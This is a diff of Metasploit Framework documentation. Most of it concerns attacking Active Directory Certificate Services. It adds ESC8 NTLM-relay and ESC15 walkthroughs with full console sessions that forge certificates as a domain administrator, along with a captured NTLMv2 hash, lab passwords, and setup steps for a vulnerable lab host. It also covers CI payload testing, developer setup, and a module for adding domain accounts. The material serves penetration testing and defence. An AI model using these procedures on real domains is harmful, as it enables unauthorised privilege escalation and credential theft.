  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -0,0 +1,41 @@
+Payloads for Metasploit Framework can now be tested when opening pull requests. This is handled by GitHub actions within 
+our CI, this workflow will build the payloads using the appropriate repositories and branches. It will then run our 
+acceptance tests against those changes. This requires adding GitHub labels for each corresponding payload repository. 
+The labels will contain the `payload-testing` prefix, each supporting testing for an external repository:
+ - `payload-testing-branch` ([https://github.com/rapid7/metasploit-payloads/](https://github.com/rapid7/metasploit-payloads/))
+ - `payload-testing-mettle-branch` ([https://github.com/rapid7/mettle/](https://github.com/rapid7/mettle/))
+
+**_Note_**:
+
+The long term aim is supporting workflow dispatches for this job, but that is currently not working as expected. So as a
+work-around we will need to edit the workflow locally. Once the testing has been completed ensure the following locally 
+changes are reverted before merging.
+
+Once the appropriate repository label is added, you will need to edit the GitHub workflow to point at the specific 
+repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
+the following lines like so:
+
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
+```yaml
+repository: foo-r7/metasploit-framework
+```
+
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
+```yaml
+ref: fixes-all-the-bugs
+```
+
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
+```yaml
+repository: foo-r7/metasploit-payloads
+```
+
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
+```yaml
+ref: fixes-all-the-payload-bugs
+```
+
+Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
+following lines would need updated:
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -8,14 +8,20 @@ flowchart TD
    subgraph ad_cs_cert_templates[<b>ad_cs_cert_templates</b>]
        ESC4(ESC4)
        update_template[<i>Update Template</i>]
-        ESC4 --> update_template
+        ESC4 -- abuse privileges --> update_template
+    end
+    subgraph relay/esc8[<b>relay/esc8</b>]
+        ESC8(ESC8)
+        ESC8 --> web_enrollment[<i>Issuance via Web Enrollment</i>]
    end
    subgraph icpr_cert[<b>icpr_cert</b>]
        ESC1(ESC1)
        ESC2(ESC2)
        ESC3(ESC3)
        ESC13(ESC13)
+        ESC15(ESC15)
        alt_subject[<i>Alternate Subject Issuance</i>]
+        add_policies[<i>Alternate Subject Issuance</i><br>and<br><i>Add Policy OIDs</i>]
        as_eagent[<i>Enrollment Agent Issuance</i>]
        normal[<i>Normal Issuance</i>]

@@ -23,23 +29,32 @@ flowchart TD
        ESC2 --> as_eagent
        ESC3 --> as_eagent
        ESC13 --> normal
+        ESC15 --> add_policies
        as_eagent -- use new certificate --> normal
    end
    subgraph kerberos/get_ticket[<b>kerberos/get_ticket</b>]
        PKINIT[<i>PKINIT</i>]
    end
+    subgraph ldap/ldap_login[<b>ldap/ldap_login</b>]
+        SCHANNEL[<i>SCHANNEL</i>]
+    end
    subgraph ldap_esc_vulnerable_cert_finder[<b>ldap_ecs_vulnerable_cert_finder</b>]
        find_vulnerable_templates[<i>Find Vulnerable Templates</i>]
    end
+    add_policies -- add client authentication oid --> SCHANNEL
+    add_policies -- add certificate request agent oid --> as_eagent
    alt_subject --> PKINIT
+    alt_subject --> SCHANNEL
    find_vulnerable_templates --> icpr_cert
    normal --> PKINIT
+    normal --> SCHANNEL
    update_template --> ESC1
+    web_enrollment --> PKINIT
+    web_enrollment --> SCHANNEL
 ```

-The chart above showcases how one can go about attacking five unique AD CS
-vulnerabilities, taking advantage of various flaws in how certificate templates are
-configured on an Active Directory Certificate Server.
+The chart above showcases how one can go about attacking each of the AD CS vulnerabilities supported by Metasploit,
+taking advantage of various flaws in how certificate templates are configured on an Active Directory Certificate Server.

 The following sections will walk through each of these steps, starting with enumerating
 certificate templates that the server has to offer and identifying those that are
@@ -71,6 +86,7 @@ attacks that they found they could conduct via misconfigured certificate templat
  Manager Approval + Enrollable Client Authentication/Smart Card Logon OID templates
 - ESC7 - Vulnerable Certificate Authority Access Control
 - ESC8 - NTLM Relay to AD CS HTTP Endpoints
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc8]]

 Later, additional techniques were disclosed by security researchers:

@@ -93,9 +109,15 @@ Later, additional techniques were disclosed by security researchers:
 - ESC13 - Domain escalation via issuance policies with group links.
  - [ADCS ESC13 Abuse Technique](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53)
  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc13]]
+- ESC14 - Explicit certificate mappings through `altSecurityIdentities` write access abuse
+  - [ADCS ESC14 Abuse Technique](https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9)
+- ESC15 (AKA EKUwu) - Domain escalation via No Issuance Requirements + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + Policy OID
+  manipulation
+  - [EKUwu: Not just another AD CS ESC](https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc)
+  - [[Exploit Steps|attacking-ad-cs-esc-vulnerabilities.md#exploiting-esc15]]

-Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4 and ESC13. As such,
-this page only covers exploiting ESC1 through ESC4 and ESC13 at this time.
+Currently, Metasploit only supports attacking ESC1, ESC2, ESC3, ESC4, ESC8, ESC13 and ESC15. As such, this page only
+covers exploiting that subset of ESC flaws.

 Before continuing, it should be noted that ESC1 is slightly different than ESC2 and ESC3
 as the diagram notes above. This is because in ESC1, one has control over the
@@ -155,7 +177,7 @@ Domain Controller (DC), and will run a set of LDAP queries to gather a list of c
 templates they make available for enrollment. It will then also query the permissions on both the CA and the certificate template to figure out
 which users or groups can use that certificate template to elevate their privileges.

-Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, and ESC13. The
+Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13 and ESC15. The
 module is limited to checking for these techniques due to them being identifiable remotely from a normal user account by
 analyzing the objects in LDAP.

@@ -850,6 +872,55 @@ msf6 auxiliary(admin/ldap/ad_cs_cert_template) >
 At this point the certificate template's configuration has been restored and the operator has a certificate that can be
 used to authenticate to Active Directory as the Domain Admin.

+# Exploiting ESC8
+ESC8 leverages relaying NTLM authentication from an SMB server (running on Metasploit) to the HTTP(S) AD CS Web
+Enrollment portal running on a remote target. The attacker will need to coerce a client with privileges to authenticate
+to the target portal to authenticate to Metasploit instead. This can be achieved via a few techniques, including name
+poisoning via the `capture` plugin, coercion via the `auxiliary/scanner/dcerpc/petitpotam` module, or even a well placed
+UNC path. Once authentication has been relayed and an authorized HTTP session has been established, the attacker can
+query available certificate templates as well as issue them.
+
+Exploitation of this flaw is facilitated through the `auxiliary/server/relay/esc8` module which handles starting the SMB
+relay server and enables configuration of what happens when relaying is successful. Users can select from different
+operational "modes" via the MODE datastore option which controls what the module will do. For a full description, see
+the modules documentation. The default mode, "AUTO" will issue a User certificate if the relayed connection is for a
+user account or a Machine certificate if it's for a machine account. Once this certificate has been issued, it can be
+used for authentication. See the [Authenticating With A Certificate](#authenticating-with-a-certificate) section for
+more information.
+
+In the following example the AUTO mode is used to issue a certificate for the MSFLAB\smcintyre once they have
+authenticated.
+
+```msf
+msf6 auxiliary(server/relay/esc8) > set RELAY_TARGETS 172.30.239.85
+msf6 auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 1.
+msf6 auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Relaying to next target http://172.30.239.85:80/certsrv/
+[+] Identity: MSFLAB\smcintyre - Successfully authenticated against relay target http://172.30.239.85:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 172.30.239.85
+[SMB] NTLMv2-SSP Username   : MSFLAB\smcintyre
+[SMB] NTLMv2-SSP Hash       : smcintyre::MSFLAB:821ad4c6b40475f4:07a6e0fd89d9af86a5b0e12d24915b4d:010100000000000071fe99aa0a27db01eabcbc6e8fcb6ed20000000002000c004d00530046004c00410042000100040044004300040018006d00730066006c00610062002e006c006f00630061006c0003001e00440043002e006d00730066006c00610062002e006c006f00630061006c00050018006d00730066006c00610062002e006c006f00630061006c000700080071fe99aa0a27db01060004000200000008003000300000000000000001000000002000004206ecc9e398d7766166f0f45d8bdcf7708c8f278f2cff1cc58017f9acf0f5400a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000
+
+[*] Creating certificate request for MSFLAB\smcintyre using the User template
+[*] Generating CSR...
+[*] CSR Generated
+[*] Requesting relay target generate certificate...
+[+] Certificate generated using template User and MSFLAB\smcintyre
+[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=184&
+[+] Certificate for MSFLAB\smcintyre using template User saved to /home/smcintyre/.msf4/loot/20241025142116_default_172.30.239.85_windows.ad.cs_995918.pfx
+[*] Relay tasks complete; waiting for next login attempt.
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+```
+
 # Exploiting ESC13
 To exploit ESC13, we need to target a certificate that has an issuance policy linked to a universal group in Active
 Directory. Unlike some of the other ESC techniques, successfully exploiting ESC13 isn't necessarily guaranteed to yield
@@ -857,7 +928,7 @@ administrative privileges, rather the privileges that are gained are those of th
 certificate template's issuance policy. The `auxiliary/gather/ldap_esc_vulnerable_cert_finder` module is capable of
 identifying certificates that meet the necessary criteria. When one is found, the module will include the group whose
 permissions will be included in the resulting Kerberos ticket in the notes section. In the following example, the
-ESC13-Test template is vulenerable to ESC13 and will yield a ticket including the ESC13-Group permissions.
+ESC13-Test template is vulnerable to ESC13 and will yield a ticket including the ESC13-Group permissions.

 ```
 msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
@@ -911,6 +982,108 @@ msf6 auxiliary(admin/dcerpc/icpr_cert) >
 We can then use the `kerberos/get_ticket` module to gain a Kerberos ticket granting ticket (TGT) with the `ESC13-Group`
 RID present in the Groups field of the TGT PAC.

+# Exploiting ESC15
+Steps for exploiting ESC15 are similar to ESC1 whereby a privileged user such as a domain admin is specified in the
+`ALT_UPN`. In addition to targeting another user, the certificate has additional Application Policy OIDs added to it
+which adjusts the context in which the issued certificate can be used. These policy OIDs are accepted by the issuing CA
+if the target certificate template is defined using schema version 1.
+
+In the following example, the Client Authentication OID (1.3.6.1.5.5.7.3.2) is added which enables the certificate to be
+used for authentication to LDAP via SCHANNEL. The operator can then perform LDAP queries with the privileges of the user
+specified in the alternate UPN.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+SMBDomain => COLLALABS1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+CA => collalabs1-SRV-ADDS01-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
+CERT_TEMPLATE => ESC15-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.5.5.7.3.2
+ADD_CERT_APP_POLICY => 1.3.6.1.5.5.7.3.2
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN administrator@collalabs1.local
+ALT_UPN => administrator@collalabs1.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
+ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
+[*] 172.30.239.85:445 - Certificate Policies:
+[*] 172.30.239.85:445 -   * 1.3.6.1.5.5.7.3.2 (Client Authentication)
+[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009171337_default_172.30.239.85_windows.ad.cs_089081.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Certificates issued using this technique are not directly able to be used for Kerberos authentication via PKINIT.
+However, the attack can be modified by adding the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) to issue a
+certificate that can issue additional certificates in a manner similar to ESC2 which are compatible with PKINIT.
+
+```msf
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
+SMBUser => normaluser
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
+SMBDomain => COLLALABS1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
+SMBPass => normalpass
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
+CA => collalabs1-SRV-ADDS01-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
+CERT_TEMPLATE => ESC15-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
+ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
+[*] 172.30.239.85:445 - Certificate Policies:
+[*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
+[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Next, the certificate is used in conjunction with the `PFX` and `ON_BEHALF_OF` options to issue a certificate compatible
+with Kerberos as the privileged user (previously `ALT_UPN`).
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > unset ADD_CERT_APP_POLICY 
+Unsetting ADD_CERT_APP_POLICY...
+msf6 auxiliary(admin/dcerpc/icpr_cert) > unset ALT_UPN 
+Unsetting ALT_UPN...
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF COLLALABS1\\administrator
+ON_BEHALF_OF => COLLALABS1\\administrator
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
+PFX => /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate Email: administrator@collalabs1.local
+[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
+[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172817_default_172.30.239.85_windows.ad.cs_427087.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Finally, *this* certificate can be used to authenticate to Kerberos with the `kerberos/get_ticket` module.
+
 # Authenticating With A Certificate
 Metasploit supports authenticating with certificates in a couple of different ways. These techniques can be used to take
 further actions once a certificate has been issued for a particular identity (such as a Domain Admin user).
@@ -112,3 +112,19 @@ The following steps assume that you have installed an AD CS on either a new or e
 6. Click `Apply` and then click `OK` to issue the certificate.
 7. Go back to the `certsrv` screen and right click on the `Certificate Templates` folder. Then click `New` followed by `Certificate Template to Issue`.
 8. Scroll down and select the `ESC3-Template2` certificate, or whatever you named the ESC3 template number 2 template you just created, and select `OK`. The certificate should now be available to be issued by the CA server.
+
+### Setting up a ESC8 Vulnerable Host
+1. Follow instructions for creating an AD CS enabled server
+2. Select Add Roles and Features
+3. Under "Select Server Roles" expand Active Directory Certificate Services and add `Certificate Enrollment Policy Web Service`, `Certificate Enrollment Web Service`, and `Certificate Authority Web Enrollment`.
+4. For each selection, accept the default for any pop-up.
+5. Accept the default features and install.
+6. When the installation is complete, click on the warning in the Dashboard for post-deployment configuration.
+7. Under Credentials, accept the default
+8. Under Role Services, select `Certificate Authority Web Enrollment`, `Certificate Enrollment Web Service`, and `Certificate Enrollment Policy Web Service`
+9. In CA for CES, accept the defaults
+10. In Authentication Types, accept the default integrated authentication
+11. In Service account for CES, select `Use built-in application pool identity`
+12. Accept default integrated authentication for CEP
+13. Select the domain certificate in Server Certificate (the one that starts with the domain name by default) if more than one appears.
+14. Accept the remaining defaults.
@@ -30,10 +30,29 @@ sudo apt update && sudo apt install -y git autoconf build-essential libpcap-dev

 ### Windows

-If you are running a Windows machine
+#### Windows 10 or above

-* Install [chocolatey](https://chocolatey.org/)
-* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.0.3-1/rubyinstaller-devkit-3.0.3-1-x64.exe)
+* Install [winget](https://learn.microsoft.com/en-us/windows/package-manager/winget/)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
+* Install pcaprub dependencies from your PowerShell terminal:
+
+```
+[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')
+
+Expand-Archive -Path "C:\Windows\Temp\WpdPack_4_1_2.zip" -DestinationPath "C:\"
+```
+
+Install a version of PostgreSQL:
+
+```
+Install-Module -Name Microsoft.WinGet.Client
+Install-WinGetPackage -id PostgreSQL.PostgreSQL.17
+```
+
+#### Pre-Windows 10
+
+* Install [choco](https://chocolatey.org/install)
+* Install [Ruby x64 with DevKit](https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-3.3.6-1/rubyinstaller-devkit-3.3.6-1-x64.exe)
 * Install pcaprub dependencies from your cmd.exe terminal:

 ```
@@ -46,7 +65,7 @@ choco install 7zip
 Install a version of PostgreSQL:

 ```
-choco install postgresql12
+choco install postgresql17
 ```

 ## Set up your local copy of the repository
@@ -82,7 +101,9 @@ git config --global user.email "$GITHUB_EMAIL"
 git config --global github.user "$GITHUB_USERNAME"
 ```

-* Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+- Set up [msftidy] to run before each `git commit` and after each `git merge` to quickly identify potential issues with your contributions:
+
+#### Linux

 ```bash
 cd ~/git/metasploit-framework
@@ -90,8 +111,20 @@ ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/pre-commit
 ln -sf ../../tools/dev/pre-commit-hook.rb .git/hooks/post-merge
 ```

+#### Windows
+
+```powershell
+cd ~/git/metasploit-framework
+mkdir .githooks
+git config --local core.hooksPath .githooks/
+New-Item -Path pre-commit -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+New-Item -Path post-merge -ItemType SymbolicLink -Value ..\tools\dev\pre-commit-hook.rb
+```
+
 ## Install Ruby

+ **Note:** If you are using Windows, ruby installed in [Install dependencies](#install-dependencies) section, so you can skip this section
+
 Linux distributions do not ship with the latest Ruby, nor are package managers routinely updated.  Additionally, if you are working with multiple Ruby projects, each one has dependencies and Ruby versions which can start to conflict.  For these reasons, it is advisable  to use a Ruby manager.

 You could just install Ruby directly (eg. `sudo apt install ruby-dev`), but you may likely end up with the incorrect version and no way to update.  Instead, consider using one of the many different [Ruby environment managers] available.  The Metasploit team prefers [rbenv] and [rvm] (note that [rvm] does require a re-login to complete).
@@ -101,9 +134,9 @@ Regardless of your choice, you'll want to make sure that, when inside the `~/git
 ```
 $ cd ~/git/metasploit-framework
 $ cat .ruby-version
-3.0.2
+3.2.5
 $ ruby -v
-ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
+ruby 3.2.5 (2024-07-26 revision 31d0f1a2e7) [x86_64-darwin23]
 ```

 Note: the Ruby version is likely to change over time, so don't rely on the output in the above example.  Instead, confirm your `ruby -v` output with the version number listed in the `.ruby-version` file.
@@ -445,6 +445,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'How-to-use-the-Favorite-command.md'
          },
+          {
+            path: 'How-to-use-Metasploit-with-ngrok.md'
+          },
        ]
      },
    ]
@@ -853,6 +856,9 @@ NAVIGATION_CONFIG = [
          {
            path: 'Loading-Test-Modules.md'
          },
+          {
+            path: 'Payload-Testing.md'
+          },
          {
            path: 'Measuring-Metasploit-Performance.md'
          }
@@ -3,9 +3,9 @@ Request certificates via MS-ICPR (Active Directory Certificate Services). Depend
 template's configuration the resulting certificate can be used for various operations such as authentication.
 PFX certificate files that are saved are encrypted with a blank password.

-This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
+This module is capable of exploiting ESC1, ESC2, ESC3, ESC13 and ESC15.

-## Module usage 
+## Module usage

 1. From msfconsole
 2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
@@ -20,6 +20,19 @@ The target certificate authority. The default value used by AD CS is `$domain-DC
 ### CERT_TEMPLATE
 The certificate template to issue, e.g. "User".

+### ADD_CERT_APP_POLICY
+Add certificate application policy OIDs to the certificate. The ability to add policy OIDs to the certificate is
+dependent on it's configuration. More than one OID can be specified, separated by spaces, `;`, or `,`.
+
+Some useful OIDs for this purpose include:
+
+* `1.3.6.1.4.1.311.20.2.2` -- Smart Card Logon
+* `1.3.6.1.5.2.3.4` -- PKINIT Client Authentication
+* `1.3.6.1.5.5.7.3.1` -- Server Authentication
+* `1.3.6.1.5.5.7.3.2` -- Client Authentication
+* `1.3.6.1.5.5.7.3.3` -- Code Signing
+* `1.3.6.1.4.1.311.20.2.1` -- Certificate Request Agent
+
 ### ALT_DNS
 Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.

@@ -0,0 +1,109 @@
+## Vulnerable Application
+Add, lookup and delete user / machine accounts via MS-SAMR. By default standard active directory users can add up to 10
+new computers to the domain (MachineAccountQuota). Administrative privileges however are required to delete the created
+accounts, or to create/delete user accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_account`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `ACCOUNT_NAME` option for `DELETE_ACCOUNT` and `LOOKUP_ACCOUNT` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### ACCOUNT_NAME
+
+The account name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`ADD_USER`, `LOOKUP_ACCOUNT` and `DELETE_ACCOUNT` actions. If left blank for `ADD_COMPUTER`, a random, realistic name
+will be generated.
+
+### ACCOUNT_PASSWORD
+
+The password for the new account. This option is only used for the `ADD_COMPUTER` and `ADD_USER` actions. If left 
+blank, a random value will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `ACCOUNT_NAME` is set, that value will be
+used and the module will fail if the specified name is already in use. If `ACCOUNT_NAME` is *not* set, a random value
+will be used.
+
+### ADD_USER
+
+Add a new user to the domain. The account being used to create the new user must have permission to do so. 
+
+After the user account is created, the password will be set for it. The `ACCOUNT_NAME` option must be set to the name of
+the account to create. The module will fail if the specified name is already in use.
+
+### DELETE_ACCOUNT
+
+Delete a user or computer account from the domain. This action requires that the `ACCOUNT_NAME` option be set.
+
+### LOOKUP_ACCOUNT
+
+Lookup a user or computer account in the domain. This action verifies that the specified account exists, and looks up
+its security ID (SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_account) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_account) > show options
+
+Module options (auxiliary/admin/dcerpc/samr_account):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   ACCOUNT _NAME                      no        The computer name
+   ACCOUNT_PASSWORD                   no        The password for the new computer
+   RHOSTS            192.168.159.96   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             445              yes       The target port (TCP)
+   SMBDomain         .                no        The Windows domain to use for authentication
+   SMBPass           Password1        no        The password for the specified username
+   SMBUser           aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_account) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_account) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password
+
+msf6 auxiliary(admin/dcerpc/samr_account) >
+```
@@ -1,100 +0,0 @@
-## Vulnerable Application
-Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
-computers to the domain. Administrative privileges however are required to delete the created accounts.
-
-## Verification Steps
-
-1. From msfconsole
-2. Do: `use auxiliary/admin/dcerpc/samr_computer`
-3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
-   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
-4. Run the module and see that a new machine account was added
-
-## Options
-
-### SMBDomain
-
-The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
-default value.
-
-### COMPUTER_NAME
-
-The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
-`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
-
-### COMPUTER_PASSWORD
-
-The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
-will be generated.
-
-## Actions
-
-### ADD_COMPUTER
-
-Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
-user has exceeded the maximum number of computer accounts that they are allowed to create.
-
-After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
-used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
-will be used.
-
-### DELETE_COMPUTER
-
-Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
-
-### LOOKUP_COMPUTER
-
-Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
-(SID), which includes the relative ID (RID) as the last component.
-
-## Scenarios
-
-### Windows Server 2019
-
-First, a new computer account is created and its details are logged to the database.
-
-```
-msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
-RHOSTS => 192.168.159.96
-msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
-SMBUser => aliddle
